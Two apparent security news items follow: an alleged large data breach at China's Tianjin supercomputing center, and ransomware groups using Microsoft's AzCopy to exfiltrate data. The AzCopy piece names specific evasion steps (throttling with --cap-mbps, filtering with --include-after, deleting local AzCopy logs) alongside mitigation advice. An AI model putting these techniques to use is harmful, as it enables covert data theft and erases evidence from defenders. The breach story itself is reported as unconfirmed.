Massive Alleged Data Breach Targets China’s Supercomputing Center, Exposing Sensitive Defense and Scientific Research An alleged cyberattack on China’s National Supercomputing Center in Tianjin has sent shockwaves through the global cybersecurity community, with claims of over 10 petabytes of highly sensitive data stolen potentially one of the largest breaches in modern history. The incident, reportedly carried out by a hacker group operating under the name "FlamingChina," involves defense-related documents, aerospace research, missile simulations, AI development, and nuclear fusion experiments, raising serious national security concerns. The breach is said to have unfolded over several months, with attackers exploiting a compromised VPN to gain initial access before using distributed botnet tools to extract data in small, undetected chunks. This method transferring files through multiple channels to evade security monitoring allowed the operation to persist without triggering alerts. Cybersecurity experts describe the attack as a sustained, low-profile intrusion rather than a single event, highlighting vulnerabilities in large-scale infrastructure security. Samples of the stolen data have surfaced on encrypted platforms like Telegram, with the full dataset reportedly priced in the hundreds of thousands of dollars, payable in cryptocurrency. While some leaked files including technical diagrams and classified-marked documents appear authentic upon initial review, full verification remains pending, and Chinese authorities have not publicly confirmed the breach. Analysts warn that if proven true, the exposure could provide foreign intelligence agencies with unprecedented insights into China’s advanced military and scientific research, including strategic defense capabilities and high-performance computing outputs. The incident has intensified scrutiny of China’s cybersecurity posture, particularly in state-run supercomputing centers, which serve thousands of clients across defense, academia, and industry. Experts note that the breach underscores persistent weaknesses in perimeter defenses, even in advanced nations, and raises questions about the security of shared computing ecosystems critical to global research. While the attack’s sophistication was not exceptionally high, its success relied on exploiting architectural flaws a reminder of the challenges in securing distributed, high-value targets. As investigations continue, the breach has already sparked discussions on global cybersecurity cooperation and the need for stronger segmentation and monitoring in critical infrastructure. The full impact of the leak remains unclear, but if confirmed, it could reshape cyber intelligence competition and accelerate reforms in digital defense strategies worldwide.

Ransomware Groups Abuse Microsoft’s AzCopy for Stealthy Data Exfiltration Ransomware operators are exploiting Microsoft’s trusted Azure data transfer tool, AzCopy, to covertly exfiltrate sensitive data before encryption. By leveraging this legitimate utility commonly used for cloud migrations and backups attackers evade detection, blending malicious activity into routine IT operations. How the Attack Works AzCopy, a command-line utility for moving large datasets to and from Azure Storage, is rarely flagged by endpoint detection and response (EDR) solutions due to its widespread corporate trust. Threat actors, including groups like BianLian and Rhysida, use AzCopy to bulk-upload stolen files to attacker-controlled Azure Blob storage via HTTPS connections to domains like `*.blob.core.windows.net`, which often bypass firewall restrictions. Attackers gain access through compromised Azure credentials or storage keys, then generate Shared Access Signature (SAS) tokens embedded with permissions and time windows to execute transfers without interactive logins. To avoid detection, they throttle transfer speeds using the `--cap-mbps` flag and filter files with `--include-after` to target recent, high-value data. Evasion and Detection Challenges AzCopy’s use of legitimate cloud infrastructure and standard HTTPS traffic makes it difficult to distinguish from normal operations. In some cases, exfiltration went undetected by endpoint security tools, with attackers deleting local log files (`%USERPROFILE%\.azcopy`) to erase evidence. Traditional detection methods, which focus on third-party exfiltration tools, often miss these "living-off-the-land" attacks. Mitigation and Response Security teams must monitor for anomalous AzCopy activity, such as off-hours transfers or unusual data volumes under service accounts. User and Entity Behavior Analytics (UEBA) can flag abnormal file access, while network monitoring should restrict direct internet access from servers to known endpoints. Application control policies can limit AzCopy execution to approved hosts and accounts. Incident response plans should include steps to revoke SAS tokens, rotate keys, and coordinate with cloud providers to mitigate data loss. As ransomware groups increasingly weaponize trusted cloud tools, organizations must adapt detection strategies to account for legitimate utilities being turned against them.